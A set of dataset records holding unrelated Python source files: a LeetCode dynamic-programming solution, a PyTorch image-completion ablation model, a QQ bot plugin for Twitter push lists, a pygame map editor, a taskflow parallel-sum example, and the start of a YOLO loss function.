+{"seq_id":"234038185","text":"\n#221 最大正方形\ndef maximalSquare(atrix):\n if not matrix or len(matrix[0])==0:return 0\n row = len(matrix)+1\n col = len(matrix[0])+1\n dp = [[0]*col for _ in range(row)]\n maxSize = 0\n for r in range(row-1):\n for c in range(col-1):\n if matrix[r][c] =='1':\n dp[r+1][c+1] = min(dp[r][c],dp[r+1][c],dp[r][c+1]) +1\n maxSize = max(maxSize,dp[r+1][c+1])\n return maxSize*maxSize\n","sub_path":"Week_06/maximal_square.py","file_name":"maximal_square.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"404616853","text":"\nimport torch\nimport torch.nn as nn\nimport torch.legacy.nn as lnn\n\nfrom functools import reduce\nfrom torch.autograd import Variable\n\nfrom src.models import completionnet_places2\n\n# This was obtained from https://github.com/clcarwin/convert_torch_to_pytorch\ncompletionnet_ablation = lambda x: nn.Sequential( # Sequential,\n\tnn.Conv2d(4,64,(5, 5),(1, 1),(2, 2)),\n\tnn.BatchNorm2d(64),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(64,128,(3, 3),(2, 2),(1, 1)),\n\tnn.BatchNorm2d(128),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(128,128,(3, 3),(1, 1),(1, 1)),\n\tnn.BatchNorm2d(128),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(128,256,(3, 3),(2, 2),(1, 1)),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),(1, 1),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),(1, 1),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(2, 2),(2, 2),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(4, 4),(4, 4),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(8, 8),(8, 8),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(16, 16),(16, 16),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),(1, 1),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),(1, 1),1),\n\tnn.BatchNorm2d(256),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.ConvTranspose2d(256,128,(4, 4),(2, 2),(1, 1),(0, 0)),\n\tnn.BatchNorm2d(128),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(128,128,(3, 3),(1, 1),(1, 1)),\n\tnn.BatchNorm2d(128),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.ConvTranspose2d(128,64,(4, 4),(2, 2),(1, 1),(0, 0)),\n\tnn.BatchNorm2d(64),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(64,32,(3, 3),(1, 1),(1, 1)),\n\tnn.BatchNorm2d(32),\n\tnn.ReLU(),\n nn.Dropout(x),\n\tnn.Conv2d(32,3,(3, 3),(1, 1),(1, 1)),\n\tnn.Sigmoid(),\n)\n\ndef copy_weights(A, B):\n weights = []\n for i, m in enumerate(A.modules()):\n if i == 0:\n continue\n if hasattr(m, 'weight'):\n weights.append(m.weight)\n j = 0\n for i, m in enumerate(B.modules()):\n if i == 0:\n continue\n if hasattr(m, 'weight'):\n m.weight = weights[j]\n j += 1\n\nif __name__ == \"__main__\":\n A = completionnet_places2\n A.load_state_dict(torch.load('completionnet_places2.pth'))\n B = completionnet_ablation(0.1)\n copy_weights(A, B)\n B.eval()\n for m in B.modules():\n if m.__class__.__name__.startswith('Dropout'):\n m.train()\n","sub_path":"ImagerieNumerique/src/ablation.py","file_name":"ablation.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"494508322","text":"import module.twitter as tweetListener\nfrom nonebot import on_command, CommandSession, permission\nfrom helper import commandHeadtail\nfrom tweepy import TweepError\nimport time\nimport asyncio\nimport os\nimport traceback\nimport re\n#推送列表的引用\npush_list : tweetListener.PushList = tweetListener.push_list\n\n\n# on_command 装饰器将函数声明为一个命令处理器\n@on_command('addtest', permission=permission.SUPERUSER,only_to_me = False)\nasync def addtest(session: CommandSession):\n message_type = session.event['message_type']\n sent_id = 0\n if message_type == 'private':\n sent_id = session.event['user_id']\n elif message_type == 'group':\n sent_id = session.event['group_id']\n else:\n await session.send('未收录的消息类型:'+message_type)\n return\n sent_id = str(sent_id)\n unit = push_list.baleToPushUnit(\n 1837730674,\n message_type,sent_id,805435112259096576,\n '增删测试',nick='底层轴man',none_template=\"$tweet_nick这个人发推了,爪巴\")\n push_list.addPushunit(unit)\n await session.send('done!')\n@on_command('deltest', permission=permission.SUPERUSER,only_to_me = False)\nasync def deltest(session: CommandSession):\n message_type = session.event['message_type']\n sent_id = 0\n if message_type == 'private':\n sent_id = session.event['user_id']\n elif message_type == 'group':\n sent_id = session.event['group_id']\n else:\n await session.send('未收录的消息类型:'+message_type)\n return\n sent_id = str(sent_id)\n s = push_list.delPushunitFromPushToAndTweetUserID(message_type,sent_id,805435112259096576)\n await session.send(s)\n\n@on_command('delall',aliases=['这里单推bot'], permission=permission.SUPERUSER,only_to_me = True)\nasync def delalltest(session: CommandSession):\n message_type = session.event['message_type']\n sent_id = 0\n if message_type == 'private':\n sent_id = session.event['user_id']\n elif message_type == 'group':\n sent_id = session.event['group_id']\n else:\n await session.send('未收录的消息类型:'+message_type)\n return\n sent_id = str(sent_id)\n push_list.delPushunitFromPushTo(message_type,sent_id)\n await session.send('已移除此地所有监测')\n\n\n#获取指定推送对象的推送列表(推送标识,推送对象ID)\ndef get_pushTo_spylist(message_type:str,pushTo:int):\n if message_type not in push_list.message_type_list:\n raise Exception(\"无效的消息类型!\",message_type)\n table = push_list.getLitsFromPushTo(message_type,pushTo)\n s = ''\n unit_cout = 0\n for key in table:\n unit_cout = unit_cout + 1\n s = s + (table[key]['nick'] if table[key]['nick'] != '' else tweetListener.myStreamListener.tryGetNick(key,\"未定义昵称\")) + \\\n \",\" + str(key) + ',' + table[key]['des'] + \"\\n\"\n s = s + '总监测数:' + str(unit_cout)\n if unit_cout == 0:\n s = s + '\\n' + '单 推 b o t'\n return s\n@on_command('getpushlist',aliases=['DD列表'],only_to_me = False)\nasync def getpushlist(session: CommandSession):\n message_type = session.event['message_type']\n sent_id = 0\n if message_type == 'private':\n sent_id = session.event['user_id']\n elif message_type == 'group':\n sent_id = session.event['group_id']\n else:\n await session.send('未收录的消息类型:'+message_type)\n return\n s = get_pushTo_spylist(message_type,sent_id)\n await session.send(s)\n\n@on_command('getuserinfo',aliases=['查询推特用户'],permission=permission.SUPERUSER,only_to_me = True)\nasync def getuserinfo(session: CommandSession):\n stripped_arg = session.current_arg_text.strip()\n if stripped_arg == '':\n return\n try:\n if stripped_arg.isdecimal():\n userinfo = tweetListener.api.get_user(user_id = int(stripped_arg))\n else:\n userinfo = tweetListener.api.get_user(screen_name = stripped_arg)\n except TweepError:\n s = traceback.format_exc(limit=5)\n tweetListener.log_print(3,'推Py错误'+s)\n await session.send(\"查询不到信息\")\n return\n tweetListener.myStreamListener.seve_image(userinfo.screen_name,userinfo.profile_image_url_https,'userinfo')\n file_suffix = os.path.splitext(userinfo.profile_image_url_https)[1]\n s = '用户UID:'+ str(userinfo.id) + \"\\n\" + \\\n '用户ID:' + userinfo.screen_name + \"\\n\" + \\\n '用户昵称:' + userinfo.name + \"\\n\" + \\\n '头像:' + '[CQ:image,file=userinfo/' + userinfo.screen_name + file_suffix + ']'+ \"\\n\" + \\\n '描述:' + userinfo.description + \"\\n\" + \\\n '推文受保护:' + str(userinfo.protected) + \"\\n\" + \\\n '被关注数:' + str(userinfo.followers_count) + \"\\n\" + \\\n '关注数:' + str(userinfo.friends_count) + \"\\n\" + \\\n '发推数(包括转发):' + str(userinfo.statuses_count) + \"\\n\" + \\\n '账户创建时间:' + str(userinfo.created_at)\n await asyncio.sleep(2.5)\n await session.send(s)\n@on_command('delone',aliases=['我不想D了'],permission=permission.SUPERUSER,only_to_me = True)\nasync def delOne(session: CommandSession):\n stripped_arg = session.current_arg_text.strip()\n if stripped_arg == '':\n await session.send(\"缺少参数\")\n return\n if stripped_arg == re.match('[A-Za-z0-9_]+', stripped_arg, flags=0):\n await session.send(\"用户名/用户ID 只能包含字母、数字或下划线\")\n return\n try:\n if stripped_arg.isdecimal():\n userinfo = tweetListener.api.get_user(user_id = int(stripped_arg))\n else:\n userinfo = tweetListener.api.get_user(screen_name = stripped_arg)\n except TweepError:\n s = traceback.format_exc(limit=5)\n tweetListener.log_print(3,'推Py错误:'+s)\n await session.send(\"查询不到信息,bksn\")\n return\n tweetListener.myStreamListener.seve_image(userinfo.screen_name,userinfo.profile_image_url_https,'userinfo')\n file_suffix = os.path.splitext(userinfo.profile_image_url_https)[1]\n res = push_list.delPushunitFromPushToAndTweetUserID(\n session.event['message_type'],\n session.event[('group_id' if session.event['message_type'] == 'group' else 'user_id')],\n userinfo.id\n )\n s = '用户UID:'+ str(userinfo.id) + \"\\n\" + \\\n '用户ID:' + userinfo.screen_name + \"\\n\" + \\\n '用户昵称:' + userinfo.name + \"\\n\" + \\\n '头像:' + '[CQ:image,file=userinfo/' + userinfo.screen_name + file_suffix + ']'+ \"\\n\" + \\\n ('此用户已移出监听列表' if res[0] == True else '移除失败:'+res[1])\n await session.send(s)\n\n@on_command('addone',aliases=['给俺D一个'],permission=permission.SUPERUSER,only_to_me = True)\nasync def addOne(session: CommandSession):\n stripped_arg = session.current_arg_text.strip()\n if stripped_arg == '':\n await session.send(\"缺少参数\")\n return\n if stripped_arg == re.match('[A-Za-z0-9_]+', stripped_arg, flags=0):\n await session.send(\"用户名/用��ID 只能包含字母、数字或下划线\")\n return\n cs = commandHeadtail(stripped_arg)\n try:\n if cs[0].isdecimal():\n userinfo = tweetListener.api.get_user(user_id = int(cs[0]))\n else:\n userinfo = tweetListener.api.get_user(screen_name = cs[0])\n except TweepError:\n s = traceback.format_exc(limit=5)\n tweetListener.log_print(3,'推Py错误:'+s)\n await session.send(\"查询不到信息,你D都能D歪来\")\n return\n tweetListener.myStreamListener.seve_image(userinfo.screen_name,userinfo.profile_image_url_https,'userinfo')\n file_suffix = os.path.splitext(userinfo.profile_image_url_https)[1]\n nick = ''\n des = ''\n if cs[2] != '':\n cs = commandHeadtail(cs[2])\n nick = cs[0]\n des = cs[2]\n PushUnit = push_list.baleToPushUnit(\n session.event['self_id'],\n session.event['message_type'],\n session.event[('group_id' if session.event['message_type'] == 'group' else 'user_id')],\n userinfo.id,des,nick = nick\n )\n res = push_list.addPushunit(PushUnit)\n s = '用户UID:'+ str(userinfo.id) + \"\\n\" + \\\n '用户ID:' + userinfo.screen_name + \"\\n\" + \\\n '用户昵称:' + userinfo.name + \"\\n\" + \\\n '头像:' + '[CQ:image,file=userinfo/' + userinfo.screen_name + file_suffix + ']'+ \"\\n\" + \\\n ('此用户已添加至监听列表' if res[0] == True else '添加失败:'+res[1])\n await session.send(s)\n\n\n#推特ID编码解码\n#解码成功返回推特ID,失败返回-1\ndef decode_b64(str) -> int:\n table = {\"0\": 0, \"1\": 1, \"2\": 2, \"3\": 3, \"4\": 4, \"5\": 5,\n \"6\": 6, \"7\": 7, \"8\": 8, \"9\": 9,\n \"a\": 10, \"b\": 11, \"c\": 12, \"d\": 13, \"e\": 14, \"f\": 15, \"g\": 16,\n \"h\": 17, \"i\": 18, \"j\": 19, \"k\": 20, \"l\": 21, \"m\": 22, \"n\": 23,\n \"o\": 24, \"p\": 25, \"q\": 26, \"r\": 27, \"s\": 28, \"t\": 29, \"u\": 30,\n \"v\": 31, \"w\": 32, \"x\": 33, \"y\": 34, \"z\": 35,\n \"A\": 36, \"B\": 37, \"C\": 38, \"D\": 39, \"E\": 40, \"F\": 41, \"G\": 42,\n \"H\": 43, \"I\": 44, \"J\": 45, \"K\": 46, \"L\": 47, \"M\": 48, \"N\": 49,\n \"O\": 50, \"P\": 51, \"Q\": 52, \"R\": 53, \"S\": 54, \"T\": 55, \"U\": 56,\n \"V\": 57, \"W\": 58, \"X\": 59, \"Y\": 60, \"Z\": 61,\n \"$\": 62, \"_\": 63}\n result : int = 0\n for i in range(len(str)):\n result *= 64\n if str[i] not in table:\n return -1\n result += table[str[i]]\n return result + 1253881609540800000\n@on_command('detweetid',only_to_me = False)\nasync def decodetweetid(session: CommandSession):\n stripped_arg = session.current_arg_text.strip()\n if stripped_arg == '':\n return\n res = decode_b64(stripped_arg)\n if res == -1:\n await session.send(\"缩写推特ID不正确\")\n return\n await session.send(\"推特ID为:\"+str(res))\n #parameter = commandHeadtail(stripped_arg)\n@on_command('entweetid',only_to_me = False)\nasync def encodetweetid(session: CommandSession):\n stripped_arg = session.current_arg_text.strip()\n if stripped_arg == '':\n return\n if not stripped_arg.isdecimal():\n await session.send(\"推特ID不正确\")\n return\n res = tweetListener.encode_b64(int(stripped_arg))\n await session.send(\"推特ID缩写为:\"+res)\n #parameter = commandHeadtail(stripped_arg)\n\n\"\"\"\n\t'font': 8250736, \n 'message': [{'type': 'text', 'data': {'text': '!getpushlist'}}], \n 'message_id': 436, \n 'message_type': 'private', \n 'post_type': 'message', \n 'raw_message': '!getpushlist', \n 'self_id': 1837730674, \n 'sender': {'age': 20, 'nickname': '晨轩°', 'sex': 'male', 'user_id': 3309003591}, \n 'sub_type': 'friend', \n 'time': 1587967443, \n 'user_id': 3309003591, \n 'to_me': True}\n\"\"\"","sub_path":"plugins/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":10852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"489878604","text":"#coding:utf-8\nimport random,pygame,os\nfrom pygame.locals import *\nfrom lib import *\n\ndef aff(cam,mape,terrains,imgterrains,t,pos,cx,cy,tcrs,tptsel,er):\n bts=[]\n for x in range(10): bts.append(None)\n fenetre.fill((0,0,0))\n #map\n for x in range(-cam[0],-cam[0]+int(tex/t)):\n for y in range(-cam[1],-cam[1]+int(tey/t)):\n if x>0 and y>0 and x < mape.shape[0]-1 and y < mape.shape[1]-1:\n mm=mape[x,y]\n if mm>len(terrains)-1:\n mm=0\n if terrains[mm]==\"eau\":\n lc=getopsmca([terrains.index(\"eau\"),terrains.index(\"eau_profonde\"),terrains.index(\"eau_peu_profonde\")],x,y,mape)\n # 0,0=no 1,0=n 2,0=ne 0,1=o 1,1=c 2,1=e 0,2=so 1,2=s 2,2=se\n no,n,ne,o,e,so,s,se=lc[0,0],lc[1,0],lc[2,0],lc[0,1],lc[2,1],lc[0,2],lc[1,2],lc[2,2]\n fenetre.blit(imgterrains[terrains.index(\"herbe\")],[(cam[0]+x)*t,(cam[1]+y)*t])\n fenetre.blit(er[0][0],[(cam[0]+x)*t,(cam[1]+y)*t])\n if no: fenetre.blit(er[0][1],[(cam[0]+x)*t,(cam[1]+y)*t])\n if n: fenetre.blit(er[0][2],[(cam[0]+x)*t,(cam[1]+y)*t])\n if ne: fenetre.blit(er[0][3],[(cam[0]+x)*t,(cam[1]+y)*t])\n if o: fenetre.blit(er[0][4],[(cam[0]+x)*t,(cam[1]+y)*t])\n if e: fenetre.blit(er[0][5],[(cam[0]+x)*t,(cam[1]+y)*t])\n if so: fenetre.blit(er[0][6],[(cam[0]+x)*t,(cam[1]+y)*t])\n if s: fenetre.blit(er[0][7],[(cam[0]+x)*t,(cam[1]+y)*t])\n if se: fenetre.blit(er[0][8],[(cam[0]+x)*t,(cam[1]+y)*t])\n elif terrains[mm]==\"eau_profonde\":\n lc=getopsmca([terrains.index(\"eau\"),terrains.index(\"eau_profonde\"),terrains.index(\"eau_peu_profonde\")],x,y,mape)\n # 0,0=no 1,0=n 2,0=ne 0,1=o 1,1=c 2,1=e 0,2=so 1,2=s 2,2=se\n no,n,ne,o,e,so,s,se=lc[0,0],lc[1,0],lc[2,0],lc[0,1],lc[2,1],lc[0,2],lc[1,2],lc[2,2]\n fenetre.blit(imgterrains[terrains.index(\"herbe\")],[(cam[0]+x)*t,(cam[1]+y)*t])\n fenetre.blit(er[1][0],[(cam[0]+x)*t,(cam[1]+y)*t])\n if no: fenetre.blit(er[1][1],[(cam[0]+x)*t,(cam[1]+y)*t])\n if n: fenetre.blit(er[1][2],[(cam[0]+x)*t,(cam[1]+y)*t])\n if ne: fenetre.blit(er[1][3],[(cam[0]+x)*t,(cam[1]+y)*t])\n if o: fenetre.blit(er[1][4],[(cam[0]+x)*t,(cam[1]+y)*t])\n if e: fenetre.blit(er[1][5],[(cam[0]+x)*t,(cam[1]+y)*t])\n if so: fenetre.blit(er[1][6],[(cam[0]+x)*t,(cam[1]+y)*t])\n if s: fenetre.blit(er[1][7],[(cam[0]+x)*t,(cam[1]+y)*t])\n if se: fenetre.blit(er[1][8],[(cam[0]+x)*t,(cam[1]+y)*t])\n elif terrains[mm]==\"route\":\n lc=getopsmca([terrains.index(\"route\")],x,y,mape)\n # 0,0=no 1,0=n 2,0=ne 0,1=o 1,1=c 2,1=e 0,2=so 1,2=s 2,2=se\n no,n,ne,o,e,so,s,se=lc[0,0],lc[1,0],lc[2,0],lc[0,1],lc[2,1],lc[0,2],lc[1,2],lc[2,2]\n fenetre.blit(imgterrains[terrains.index(\"herbe\")],[(cam[0]+x)*t,(cam[1]+y)*t])\n if no: fenetre.blit(er[2][1],[(cam[0]+x)*t,(cam[1]+y)*t])\n if n: fenetre.blit(er[2][2],[(cam[0]+x)*t,(cam[1]+y)*t])\n if ne: fenetre.blit(er[2][3],[(cam[0]+x)*t,(cam[1]+y)*t])\n if o: fenetre.blit(er[2][4],[(cam[0]+x)*t,(cam[1]+y)*t])\n if e: fenetre.blit(er[2][5],[(cam[0]+x)*t,(cam[1]+y)*t])\n if so: fenetre.blit(er[2][6],[(cam[0]+x)*t,(cam[1]+y)*t])\n if s: fenetre.blit(er[2][7],[(cam[0]+x)*t,(cam[1]+y)*t])\n if se: fenetre.blit(er[2][8],[(cam[0]+x)*t,(cam[1]+y)*t])\n elif terrains[mm]==\"eau_peu_profonde\":\n lc=getopsmca([terrains.index(\"eau\"),terrains.index(\"eau_profonde\"),terrains.index(\"eau_peu_profonde\")],x,y,mape)\n # 0,0=no 1,0=n 2,0=ne 0,1=o 1,1=c 2,1=e 0,2=so 1,2=s 2,2=se\n no,n,ne,o,e,so,s,se=lc[0,0],lc[1,0],lc[2,0],lc[0,1],lc[2,1],lc[0,2],lc[1,2],lc[2,2]\n fenetre.blit(imgterrains[terrains.index(\"herbe\")],[(cam[0]+x)*t,(cam[1]+y)*t])\n fenetre.blit(er[3][0],[(cam[0]+x)*t,(cam[1]+y)*t])\n if no: fenetre.blit(er[3][1],[(cam[0]+x)*t,(cam[1]+y)*t])\n if n: fenetre.blit(er[3][2],[(cam[0]+x)*t,(cam[1]+y)*t])\n if ne: fenetre.blit(er[3][3],[(cam[0]+x)*t,(cam[1]+y)*t])\n if o: fenetre.blit(er[3][4],[(cam[0]+x)*t,(cam[1]+y)*t])\n if e: fenetre.blit(er[3][5],[(cam[0]+x)*t,(cam[1]+y)*t])\n if so: fenetre.blit(er[3][6],[(cam[0]+x)*t,(cam[1]+y)*t])\n if s: fenetre.blit(er[3][7],[(cam[0]+x)*t,(cam[1]+y)*t])\n if se: fenetre.blit(er[3][8],[(cam[0]+x)*t,(cam[1]+y)*t])\n else:\n imap=imgterrains[mm]\n fenetre.blit(imap,[(cam[0]+x)*t,(cam[1]+y)*t])\n for xx in range(cam[0]+cx-1-int(tcrs),cam[0]+cx+int(tcrs)):\n for yy in range(cam[1]+cy-1-int(tcrs),cam[1]+cy+int(tcrs)):\n pygame.draw.rect(fenetre,(0,0,255),((xx-cam[0])*t,(yy-cam[1])*t,t,t),3)\n button(10,10,125,500,(50,40,0),(100,80,10))\n fenetre.blit(pygame.transform.scale(imgterrains[tptsel],[rx(100),ry(100)]),[rx(15),ry(15)])\n texte(terrains[tptsel],20,125,20,(255,255,155))\n ct=8\n button(20,180,10*ct,5,(150,150,150),(0,0,0))\n button(20+(tcrs*ct),170,5,25,(200,200,200),(0,0,0))\n bts[0]=button(20,300,100,35,(95,55,5),(0,0,0))\n texte(\"map size X : \"+str(mape.shape[0]),25,305,15,(255,255,255))\n bts[1]=button(20,350,100,35,(95,55,5),(0,0,0))\n texte(\"map size Y : \"+str(mape.shape[1]),25,355,15,(255,255,255))\n bts[2]=button(20,400,100,35,(95,55,5),(0,0,0))\n texte(\"save\",25,405,15,(255,255,255))\n pygame.display.update()\n return bts\n\ndef quitter(encour):\n encour=False\n return encour\n\ndef main():\n cam=[0,0]\n encoure=True\n needtoaff=True\n t=30\n terrains=load_t()\n imgterrains=load_ti(pygame,t)\n er=precharger_img_er(t)\n mtx,mty=40,40\n mape=numpy.zeros([mtx,mty],dtype=int)\n nbh=gett(terrains,'herbe')\n for x in range(mtx):\n for y in range(mty):\n mape[x,y]=nbh\n d=1\n tptsel=0\n tcrs=0\n while encoure:\n if True: # needtoaff:\n pos=pygame.mouse.get_pos()\n cx=int(pos[0]/t)+1\n cy=int(pos[1]/t)+1\n bts=aff(cam,mape,terrains,imgterrains,t,pos,cx,cy,tcrs,tptsel,er)\n #needtoaff=False\n sp=pygame.mouse.get_pressed()\n if sp[0]==1 :\n for xx in range(cx-1-tcrs,cx+tcrs):\n for yy in range(cy-1-tcrs,cy+tcrs):\n cxx,cyy=xx-cam[0],yy-cam[1]\n if cxx >= 0 and cxx < mape.shape[0] and cyy >= 0 and cyy < mape.shape[1]:\n mape[cxx,cyy]=tptsel\n elif sp[2]==1:\n for xx in range(cx-1-tcrs,cx+tcrs):\n for yy in range(cy-1-tcrs,cy+tcrs):\n cxx,cyy=xx-cam[0],yy-cam[1]\n if cxx >= 0 and cxx < mape.shape[0] and cyy >= 0 and cyy < mape.shape[1]:\n mape[cxx,cyy]=nbh\n for event in pygame.event.get():\n if event.type==QUIT: encoure=quitter(encoure)\n elif event.type==KEYDOWN:\n needtoaff=True\n if event.key==K_ESCAPE: encoure=quitter(encoure)\n elif event.key==K_UP:\n cam[1]+=d\n elif event.key==K_DOWN:\n cam[1]-=d\n elif event.key==K_LEFT:\n cam[0]+=d\n elif event.key==K_RIGHT:\n cam[0]-=d\n elif event.key==K_KP8:\n if tptsel0: tptsel-=1\n elif event.key==K_t:\n t+=1\n imgterrains=load_ti(pygame,t)\n elif event.key==K_g and t > 5:\n t-=1\n imgterrains=load_ti(pygame,t)\n elif event.type==MOUSEBUTTONDOWN:\n needtoaff=True\n pos=pygame.mouse.get_pos()\n rpos=pygame.Rect(pos[0],pos[1],1,1)\n isonbutton=False\n for b in bts:\n if b!=None and rpos.colliderect(b):\n di=bts.index(b)\n if di==0:\n try:\n nx=int(rentre_texte(\"new Y map size : \"))\n nmape=numpy.zeros([nx,mape.shape[1]],dtype=int)\n for x in range(nmape.shape[0]):\n for y in range(nmape.shape[1]):\n nmape[x,y]=mape[x,y]\n mape=nmape\n except: pass\n elif di==1:\n try:\n ny=int(rentre_texte(\"new X map size : \"))\n nmape=numpy.zeros([mape.shape[0],ny],dtype=int)\n for x in range(nmape.shape[0]):\n for y in range(nmape.shape[1]):\n nmape[x,y]=mape[x,y]\n mape=nmape\n except: pass\n elif di==2:\n nm=rentre_texte(\"map name : \")+\".nath\"\n save_mape(mape,nm)\n if not isonbutton:\n if event.button == 4:\n if tcrs < 10 : tcrs+=1\n elif event.button == 5:\n if tcrs > 0 : tcrs-=1\n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"create_map.py","file_name":"create_map.py","file_ext":"py","file_size_in_byte":10238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"547905877","text":"import contextlib\r\nimport time\r\nfrom taskflow import engines\r\nfrom taskflow.patterns import linear_flow\r\nfrom taskflow.patterns import unordered_flow\r\nfrom taskflow import task\r\n\r\n\r\n@contextlib.contextmanager\r\ndef show_time(name):\r\n print(\">>>'{}' flow will start ...\".format(name))\r\n start = time.time()\r\n yield\r\n end = time.time()\r\n print(\">>>'{0}' flow end. took {1:.3f}s\".format(name, end - start))\r\n\r\n\r\nclass SumSlice(task.Task):\r\n def execute(self, inputs):\r\n return sum(inputs)\r\n\r\n\r\nclass SumSlices(task.Task):\r\n def execute(self, *args, **kwargs):\r\n return sum(kwargs.values())\r\n\r\n\r\n# 对集合进行分块 elem_list: 集合元素,chunk_size:块大小\r\ndef slice_iter(chunk_size, elem_list):\r\n chunk = []\r\n for elem in elem_list:\r\n chunk.append(elem)\r\n if len(chunk) == chunk_size:\r\n yield chunk\r\n chunk = []\r\n\r\n if len(chunk):\r\n yield chunk\r\n\r\n return None\r\n\r\n\r\nelem_list = range(0, 10 ** 5)\r\nslice_size = 10 ** 4\r\n\r\nlflow = linear_flow.Flow(\"root\") # 负责uflow,SumSlices()\r\nstore = {} # 准备各片数据\r\nprovided = [] # \"标识符\"对应各片的计算结果\r\nuflow = unordered_flow.Flow('map') # 负责各片的SumSlice()\r\nGr = slice_iter(slice_size, elem_list) # 生成器, 返回元素为\"slice\"\r\n\r\n# 注意:任务数越少越好\r\nfor i, _slice in enumerate(Gr):\r\n slice_name = 'slice_{}'.format(i)\r\n store[slice_name] = _slice\r\n provided.append(\"result_{}\".format(i))\r\n\r\n # 这里会并行执行:输入参数'slice_n', 输出结果'result_n'\r\n uflow.add(SumSlice(name=slice_name, rebind={'inputs': slice_name}, provides=provided[-1]))\r\n\r\nlflow.add(\r\n # execute(name)自动获取name值:1.在engines.load的store={'name': val}查找 2.其它任务的输出结果, 若provides='name'\r\n # execute(name)自动保存结果:1.按任务名称保存到engine.storage对象 2.输入给其他任务使用,若provides='name'\r\n # rebind={'name': 'myName'}\r\n # rebind=['myName'] 同上,重新邦定参数\r\n uflow,\r\n\r\n # requires=['result_1', 'result_2', ...]\r\n # 理解:在[store={},其他任务输出]中查找'result_1','result_2',作[关键词参数]传给execute(self, *args, **kwargs)\r\n SumSlices(name='total_sum', requires=provided)\r\n)\r\n\r\nengine = engines.load(lflow, engine='parallel', store=store, max_workers=1)\r\nwith show_time(lflow.name.title()):\r\n engine.run()\r\n\r\nassert engine.storage.get('total_sum') == sum(elem_list)\r\n","sub_path":"python/taskflow/my-example/deal_list_elem.py","file_name":"deal_list_elem.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"492666425","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.autograd import Variable\r\nfrom utilities import input_to_box, output_to_box, get_iou, get_iou_torch, tensor2im\r\n\r\ndef simple_loss(outputs, labels, print_losses = False):\r\n loss = 0.0\r\n xy_loss = 0.0\r\n wh_loss = 0.0\r\n mse_loss = nn.MSELoss()\r\n #scale = torch.tensor([640.0,480.0]).cuda()\r\n scale = torch.tensor([1.0,1.0]).cuda()\r\n for i in range(outputs.size()[0]):\r\n box_coords = labels[i]\r\n xy_loss = mse_loss((outputs[i, :2]),(labels[i][:2]*scale))\r\n wh_loss = mse_loss((outputs[i, 2:4]),(labels[i][2:4]*scale))\r\n \r\n iou = 0.0\r\n for i in range(outputs.size()[0]):\r\n box_coords = labels[i]\r\n in_box = input_to_box(labels[i])\r\n out_box = input_to_box(outputs[i])\r\n iou += get_iou(in_box, out_box)\r\n\r\n iou /= outputs.size()[0]\r\n xy_loss = xy_loss/(outputs.size()[0])\r\n wh_loss = wh_loss/(outputs.size()[0])\r\n\r\n loss += xy_loss + wh_loss\r\n \r\n if print_losses:\r\n print(f'xy loss : {xy_loss}, wh loss : {wh_loss}')\r\n\r\n return loss, xy_loss, wh_loss, iou\r\n\r\n\r\ndef yolo_loss(outputs, labels, print_losses=False):\r\n # 8 X 5 X 15 X 20\r\n l_coord = 5\r\n l_noobj = 0.5\r\n\r\n pwhs = [[0.5, 1], [1.0,1.0], [1,0.5]]\r\n\r\n loss = 0.0\r\n xy_loss = 0.0\r\n wh_loss = 0.0\r\n obj_loss = 0.0\r\n box_no = 0\r\n #pwh = torch.tensor([4.0,3.0]).cuda()\r\n for i in range(outputs.size()[0]):\r\n \r\n box_coords = labels[i]\r\n x_grid = torch.floor(box_coords[0]*outputs.size()[3])\r\n x_off = box_coords[0]*outputs.size()[3]-x_grid\r\n y_grid = torch.floor(box_coords[1]*outputs.size()[2])\r\n y_off = box_coords[1]*outputs.size()[2]-y_grid\r\n\r\n x_grid = x_grid.long()\r\n y_grid = y_grid.long()\r\n\r\n box_aspect = box_coords[3]/box_coords[2]\r\n if box_aspect <= 3/4.0:\r\n box_no = 0\r\n pwh = torch.tensor(pwhs[0]).cuda()\r\n elif box_aspect >= 4/3.0:\r\n box_no = 2\r\n pwh = torch.tensor(pwhs[2]).cuda()\r\n else:\r\n box_no = 1\r\n pwh = torch.tensor(pwhs[1]).cuda()\r\n\r\n 